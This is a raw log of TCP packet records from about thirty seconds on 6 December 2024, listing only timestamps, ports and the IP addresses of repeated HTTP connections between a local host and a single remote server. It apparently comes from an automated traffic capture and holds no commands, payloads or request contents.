Dec 6, 2024 03:13:54.089777946 CET	50019	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.090457916 CET	80	50029	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.093770981 CET	50033	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.093904972 CET	50029	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.216075897 CET	80	50033	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.218079090 CET	50033	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.218079090 CET	50033	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.311944962 CET	50033	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.312722921 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.337814093 CET	80	50033	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.432409048 CET	80	50035	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.433883905 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.434077024 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.437772036 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.472316980 CET	80	50033	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.553734064 CET	80	50035	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.557471037 CET	80	50037	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.557595968 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.557918072 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.677620888 CET	80	50037	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.781774998 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:54.901676893 CET	80	50035	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.901693106 CET	80	50035	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:54.925563097 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:55.045428038 CET	80	50037	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:55.110654116 CET	80	50033	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:55.110707998 CET	50033	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:55.518445969 CET	80	50035	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:55.561080933 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:55.643523932 CET	80	50037	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:55.686079979 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:55.794893026 CET	80	50035	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:55.927419901 CET	80	50037	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:55.983366966 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.014280081 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.058320999 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.058445930 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.059075117 CET	50041	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.179399967 CET	80	50035	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:56.179486990 CET	50035	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.179850101 CET	80	50041	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:56.179862022 CET	80	50037	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:56.179936886 CET	50037	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.179939032 CET	50041	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.180144072 CET	50041	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.299781084 CET	80	50041	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:56.529961109 CET	50041	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:56.649826050 CET	80	50041	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:57.266721010 CET	80	50041	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:57.379654884 CET	50041	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:57.549660921 CET	80	50041	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:57.549932003 CET	50041	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:57.670280933 CET	80	50041	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:57.670356989 CET	50041	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:57.708075047 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:57.827871084 CET	80	50045	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:57.827986956 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:57.828310966 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:57.947995901 CET	80	50045	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:58.189924002 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:58.309685946 CET	80	50045	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:59.058499098 CET	80	50045	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:59.107961893 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:59.292309999 CET	80	50045	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:59.342408895 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:59.417243958 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:59.417781115 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:59.537303925 CET	80	50045	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:59.537367105 CET	50045	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:59.537463903 CET	80	50050	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:59.537529945 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:59.537801027 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:59.657517910 CET	80	50050	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:59.889858961 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.009638071 CET	80	50050	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:00.651032925 CET	80	50050	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:00.717333078 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.813745975 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.813749075 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.884152889 CET	80	50050	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:00.884232998 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.933496952 CET	80	50054	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:00.933562994 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.933706045 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.933743954 CET	80	50050	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:00.933789968 CET	50050	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:00.941941977 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:01.053347111 CET	80	50054	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:01.061657906 CET	80	50055	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:01.061705112 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:01.061923027 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:01.181674004 CET	80	50055	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:01.280055046 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:01.399836063 CET	80	50054	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:01.399848938 CET	80	50054	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:01.420504093 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:01.541280031 CET	80	50055	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:02.018362999 CET	80	50054	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:02.148484945 CET	80	50055	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:02.201718092 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:02.279522896 CET	80	50054	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:02.311106920 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:02.488950014 CET	80	50055	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:02.514192104 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:02.613744974 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:02.983815908 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:02.983939886 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:02.985933065 CET	50061	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:03.104002953 CET	80	50054	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:03.104052067 CET	50054	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:03.104427099 CET	80	50055	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:03.104465008 CET	50055	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:03.105578899 CET	80	50061	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:03.105631113 CET	50061	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:03.105751991 CET	50061	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:03.225413084 CET	80	50061	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:03.451793909 CET	50061	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:03.571546078 CET	80	50061	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:04.222676992 CET	80	50061	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:04.420442104 CET	50061	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:04.491147041 CET	80	50061	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:04.621149063 CET	50061	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:04.621154070 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:04.740995884 CET	80	50065	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:04.741173983 CET	80	50061	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:04.741276026 CET	50061	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:04.741277933 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:04.741455078 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:04.861068964 CET	80	50065	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:05.092466116 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:05.212194920 CET	80	50065	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:05.835541010 CET	80	50065	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:05.894630909 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.117204905 CET	80	50065	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:06.201688051 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.244491100 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.245242119 CET	50069	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.364451885 CET	80	50065	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:06.364892006 CET	80	50069	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:06.364922047 CET	50065	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.365025043 CET	50069	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.365268946 CET	50069	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.484885931 CET	80	50069	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:06.717950106 CET	50069	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:06.837716103 CET	80	50069	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.296551943 CET	50069	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.297209024 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.416568995 CET	80	50069	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.416616917 CET	50069	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.416838884 CET	80	50071	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.416896105 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.417045116 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.420149088 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.536669970 CET	80	50071	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.539870024 CET	80	50072	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.539930105 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.540061951 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.659698963 CET	80	50072	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.764287949 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:07.884103060 CET	80	50071	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.884150028 CET	80	50071	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:07.889275074 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:08.009068012 CET	80	50072	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:08.504966021 CET	80	50071	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:08.547806025 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:08.637320995 CET	80	50072	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:08.686043024 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:08.836292982 CET	80	50071	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:08.889724970 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:08.912159920 CET	80	50072	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:08.967287064 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.028846025 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.028886080 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.029882908 CET	50073	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.148953915 CET	80	50071	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:09.149007082 CET	50071	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.149354935 CET	80	50072	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:09.149399996 CET	50072	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.149574995 CET	80	50073	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:09.149646044 CET	50073	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.149856091 CET	50073	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.269532919 CET	80	50073	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:09.498822927 CET	50073	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:09.618634939 CET	80	50073	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:10.239011049 CET	80	50073	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:10.313720942 CET	50073	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:10.498956919 CET	80	50073	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:10.622064114 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:10.717720985 CET	50073	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:10.741892099 CET	80	50074	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:10.742049932 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:10.745724916 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:10.865552902 CET	80	50074	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:11.092392921 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:11.212435961 CET	80	50074	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:11.905635118 CET	80	50074	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:11.951689005 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.235850096 CET	80	50074	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:12.279783010 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.354788065 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.354798079 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.474795103 CET	80	50075	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:12.474899054 CET	80	50074	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:12.475019932 CET	50074	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.475022078 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.475225925 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.594893932 CET	80	50075	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:12.827740908 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:12.947643995 CET	80	50075	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:13.667907953 CET	80	50075	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:13.717268944 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:13.843337059 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:13.843971968 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:13.900055885 CET	80	50075	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:13.900115967 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:13.963651896 CET	80	50075	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:13.963687897 CET	80	50076	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:13.963711023 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:13.963821888 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:13.963821888 CET	50075	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:13.967783928 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:14.083621025 CET	80	50077	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:14.084022045 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:14.084022045 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:14.087438107 CET	80	50076	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:14.206341028 CET	80	50077	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:14.311299086 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:14.431308031 CET	80	50076	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:14.431355000 CET	80	50076	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:14.440085888 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:14.559957027 CET	80	50077	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.049616098 CET	80	50076	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.106178999 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.180861950 CET	80	50077	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.232892036 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.288268089 CET	80	50076	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.425201893 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.435946941 CET	80	50077	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.482894897 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.561655045 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.561775923 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.562573910 CET	50078	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.681818008 CET	80	50076	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.681916952 CET	50076	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.682172060 CET	80	50077	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.682224989 CET	50077	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.682255030 CET	80	50078	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:15.682359934 CET	50078	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.683368921 CET	50078	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.684509039 CET	50073	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:15.803149939 CET	80	50078	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:16.029961109 CET	50078	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:16.149810076 CET	80	50078	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:16.768954039 CET	80	50078	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:16.905716896 CET	50078	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:17.020863056 CET	80	50078	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:17.021212101 CET	50078	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:17.140356064 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:17.141376972 CET	80	50078	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:17.141428947 CET	50078	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:17.260088921 CET	80	50079	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:17.260147095 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:17.260345936 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:17.380150080 CET	80	50079	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:17.608004093 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:17.727914095 CET	80	50079	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:18.359049082 CET	80	50079	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:18.404803991 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:18.642322063 CET	80	50079	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:18.689707041 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:18.767277956 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:18.767277002 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:18.887167931 CET	80	50080	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:18.887469053 CET	80	50079	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:18.889838934 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:18.889842033 CET	50079	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:18.893701077 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:19.013679981 CET	80	50080	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:19.248601913 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:19.368509054 CET	80	50080	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.031310081 CET	80	50080	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.077702045 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.290117979 CET	80	50080	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.297699928 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.342292070 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.417615891 CET	80	50081	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.417659044 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.417901993 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.418051004 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.537591934 CET	80	50082	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.537667990 CET	80	50081	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.537962914 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.537962914 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.657816887 CET	80	50082	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.765708923 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:20.885896921 CET	80	50081	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.885917902 CET	80	50081	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:20.889703035 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:21.009501934 CET	80	50082	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:21.543657064 CET	80	50081	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:21.592253923 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:21.643623114 CET	80	50082	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:21.686028004 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:21.829054117 CET	80	50081	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:21.875823975 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:21.883275986 CET	80	50082	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:21.937701941 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.052417040 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.052444935 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.052558899 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.053283930 CET	50083	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.175173998 CET	80	50080	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:22.175286055 CET	50080	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.175420046 CET	80	50083	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:22.175652981 CET	50083	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.175652981 CET	50083	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.175762892 CET	80	50081	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:22.175775051 CET	80	50082	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:22.175993919 CET	50082	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.176000118 CET	50081	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.296116114 CET	80	50083	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:22.529922962 CET	50083	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:22.649822950 CET	80	50083	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:23.297002077 CET	80	50083	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:23.342262983 CET	50083	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:23.591805935 CET	80	50083	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:23.639134884 CET	50083	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:23.715853930 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:23.835793972 CET	80	50084	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:23.835983038 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:23.836137056 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:23.956003904 CET	80	50084	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:24.186253071 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:24.306178093 CET	80	50084	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:24.921539068 CET	80	50084	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:24.967246056 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.205357075 CET	80	50084	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:25.248501062 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.397062063 CET	80	50084	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:25.451622963 CET	50084	80	192.168.2.6	172.67.186.200
